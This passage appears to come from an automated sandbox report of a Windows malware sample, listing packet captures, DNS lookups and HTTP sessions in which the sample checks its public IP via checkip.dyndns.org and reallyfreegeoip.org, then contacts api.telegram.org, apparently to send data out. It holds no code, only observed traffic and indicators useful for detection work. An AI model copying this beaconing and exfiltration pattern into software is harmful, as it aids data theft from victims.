Sep 26, 2024 10:33:16.346502066 CEST	49752	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:16.346541882 CEST	443	49752	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:16.346649885 CEST	49752	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:16.346966982 CEST	49752	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:16.346983910 CEST	443	49752	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:16.803317070 CEST	443	49752	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:16.805524111 CEST	49752	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:16.805548906 CEST	443	49752	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:16.988964081 CEST	443	49752	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:16.989337921 CEST	443	49752	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:16.989501953 CEST	49752	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:16.989892006 CEST	49752	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:16.993618965 CEST	49751	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:16.994710922 CEST	49753	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:16.998821020 CEST	80	49751	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:16.998886108 CEST	49751	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:16.999552965 CEST	80	49753	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:16.999629974 CEST	49753	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:16.999732018 CEST	49753	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:17.004543066 CEST	80	49753	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:17.812638044 CEST	80	49753	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:17.814074039 CEST	49754	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:17.814116955 CEST	443	49754	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:17.814209938 CEST	49754	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:17.814518929 CEST	49754	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:17.814537048 CEST	443	49754	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:17.855103970 CEST	49753	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:18.270649910 CEST	443	49754	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:18.272716999 CEST	49754	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:18.272753000 CEST	443	49754	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:18.405848980 CEST	443	49754	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:18.405960083 CEST	443	49754	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:18.406008005 CEST	49754	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:18.406524897 CEST	49754	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:18.410670996 CEST	49753	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:18.415862083 CEST	80	49753	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:18.417145967 CEST	49753	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:18.417855978 CEST	49755	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:18.422710896 CEST	80	49755	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:18.422825098 CEST	49755	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:18.422907114 CEST	49755	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:18.428215981 CEST	80	49755	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:19.366019011 CEST	80	49755	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:19.367737055 CEST	49756	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:19.367783070 CEST	443	49756	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:19.367861986 CEST	49756	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:19.368341923 CEST	49756	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:19.368360996 CEST	443	49756	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:19.417609930 CEST	49755	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:19.851768017 CEST	443	49756	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:19.853768110 CEST	49756	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:19.853795052 CEST	443	49756	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:20.004620075 CEST	443	49756	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:20.004719019 CEST	443	49756	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:20.004780054 CEST	49756	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:20.005440950 CEST	49756	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:20.011795998 CEST	49755	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:20.013510942 CEST	49757	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:20.017261982 CEST	80	49755	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:20.017314911 CEST	49755	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:20.018414974 CEST	80	49757	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:20.018484116 CEST	49757	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:20.018644094 CEST	49757	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:20.023752928 CEST	80	49757	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:20.877028942 CEST	80	49757	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:20.878912926 CEST	49758	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:20.878952026 CEST	443	49758	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:20.879132032 CEST	49758	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:20.879631996 CEST	49758	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:20.879645109 CEST	443	49758	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:20.917588949 CEST	49757	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:21.342148066 CEST	443	49758	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:21.344028950 CEST	49758	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:21.344048023 CEST	443	49758	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:21.483825922 CEST	443	49758	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:21.483917952 CEST	443	49758	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:21.483978033 CEST	49758	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:21.484587908 CEST	49758	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:21.489630938 CEST	49757	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:21.491234064 CEST	49759	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:21.494669914 CEST	80	49757	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:21.494818926 CEST	49757	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:21.496030092 CEST	80	49759	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:21.498434067 CEST	49759	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:21.498434067 CEST	49759	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:21.503257036 CEST	80	49759	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:22.451740026 CEST	80	49759	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:22.453556061 CEST	49761	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:22.453588963 CEST	443	49761	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:22.453655958 CEST	49761	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:22.453985929 CEST	49761	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:22.453998089 CEST	443	49761	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:22.495752096 CEST	49759	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:22.915350914 CEST	443	49761	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:22.920917034 CEST	49761	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:22.920953035 CEST	443	49761	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:23.063678980 CEST	443	49761	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:23.063780069 CEST	443	49761	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:23.063847065 CEST	49761	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:23.064517975 CEST	49761	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:23.068562031 CEST	49759	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:23.069703102 CEST	49762	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:23.073944092 CEST	80	49759	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:23.074011087 CEST	49759	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:23.074664116 CEST	80	49762	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:23.074733973 CEST	49762	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:23.074824095 CEST	49762	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:23.079710007 CEST	80	49762	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:23.952960014 CEST	80	49762	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:23.970031023 CEST	49763	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:23.970084906 CEST	443	49763	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:23.970169067 CEST	49763	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:23.970510006 CEST	49763	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:23.970525980 CEST	443	49763	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:23.995718002 CEST	49762	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:24.428327084 CEST	443	49763	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:24.430177927 CEST	49763	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:24.430246115 CEST	443	49763	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:24.575907946 CEST	443	49763	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:24.576004982 CEST	443	49763	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:24.576065063 CEST	49763	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:24.576697111 CEST	49763	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:24.592200041 CEST	49762	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:24.597949028 CEST	80	49762	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:24.598031998 CEST	49762	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:24.602680922 CEST	49764	443	192.168.2.4	149.154.167.220
Sep 26, 2024 10:33:24.602732897 CEST	443	49764	149.154.167.220	192.168.2.4
Sep 26, 2024 10:33:24.602804899 CEST	49764	443	192.168.2.4	149.154.167.220
Sep 26, 2024 10:33:24.603214979 CEST	49764	443	192.168.2.4	149.154.167.220
Sep 26, 2024 10:33:24.603235960 CEST	443	49764	149.154.167.220	192.168.2.4
Sep 26, 2024 10:33:25.249052048 CEST	443	49764	149.154.167.220	192.168.2.4
Sep 26, 2024 10:33:25.249250889 CEST	49764	443	192.168.2.4	149.154.167.220
Sep 26, 2024 10:33:25.250989914 CEST	49764	443	192.168.2.4	149.154.167.220
Sep 26, 2024 10:33:25.251003981 CEST	443	49764	149.154.167.220	192.168.2.4
Sep 26, 2024 10:33:25.251265049 CEST	443	49764	149.154.167.220	192.168.2.4
Sep 26, 2024 10:33:25.252708912 CEST	49764	443	192.168.2.4	149.154.167.220
Sep 26, 2024 10:33:25.295424938 CEST	443	49764	149.154.167.220	192.168.2.4
Sep 26, 2024 10:33:25.611380100 CEST	443	49764	149.154.167.220	192.168.2.4
Sep 26, 2024 10:33:25.611445904 CEST	443	49764	149.154.167.220	192.168.2.4
Sep 26, 2024 10:33:25.612481117 CEST	49764	443	192.168.2.4	149.154.167.220
Sep 26, 2024 10:33:25.616482973 CEST	49764	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 10:33:09.234499931 CEST	54663	53	192.168.2.4	1.1.1.1
Sep 26, 2024 10:33:09.322171926 CEST	53	54663	1.1.1.1	192.168.2.4
Sep 26, 2024 10:33:10.792325020 CEST	57727	53	192.168.2.4	1.1.1.1
Sep 26, 2024 10:33:10.958209038 CEST	53	57727	1.1.1.1	192.168.2.4
Sep 26, 2024 10:33:24.592155933 CEST	55853	53	192.168.2.4	1.1.1.1
Sep 26, 2024 10:33:24.602086067 CEST	53	55853	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 10:33:09.234499931 CEST	192.168.2.4	1.1.1.1	0x2c81	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 10:33:10.792325020 CEST	192.168.2.4	1.1.1.1	0xdd73	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 10:33:24.592155933 CEST	192.168.2.4	1.1.1.1	0x89bd	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 10:33:09.322171926 CEST	1.1.1.1	192.168.2.4	0x2c81	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 10:33:09.322171926 CEST	1.1.1.1	192.168.2.4	0x2c81	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 10:33:09.322171926 CEST	1.1.1.1	192.168.2.4	0x2c81	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 10:33:09.322171926 CEST	1.1.1.1	192.168.2.4	0x2c81	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 10:33:09.322171926 CEST	1.1.1.1	192.168.2.4	0x2c81	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 10:33:09.322171926 CEST	1.1.1.1	192.168.2.4	0x2c81	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 10:33:10.958209038 CEST	1.1.1.1	192.168.2.4	0xdd73	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 10:33:10.958209038 CEST	1.1.1.1	192.168.2.4	0xdd73	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 10:33:24.602086067 CEST	1.1.1.1	192.168.2.4	0x89bd	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49744	132.226.8.169	80	7472	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 10:33:09.332925081 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 10:33:10.291220903 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:10 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 10:33:10.295605898 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 10:33:10.623090029 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:10 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 10:33:11.650115967 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 10:33:11.996979952 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:11 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49749	132.226.8.169	80	7472	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 10:33:12.630379915 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 10:33:14.421216965 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:13 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 10:33:14.421868086 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:13 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 10:33:14.422338963 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:13 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 10:33:14.423542976 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:13 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49751	132.226.8.169	80	7472	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 10:33:15.045784950 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 10:33:16.344799042 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:15 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 10:33:16.344932079 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:15 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49753	132.226.8.169	80	7472	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 10:33:16.999732018 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 10:33:17.812638044 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:17 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49755	132.226.8.169	80	7472	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 10:33:18.422907114 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 10:33:19.366019011 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:19 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49757	132.226.8.169	80	7472	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 10:33:20.018644094 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 10:33:20.877028942 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:20 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49759	132.226.8.169	80	7472	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 10:33:21.498434067 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
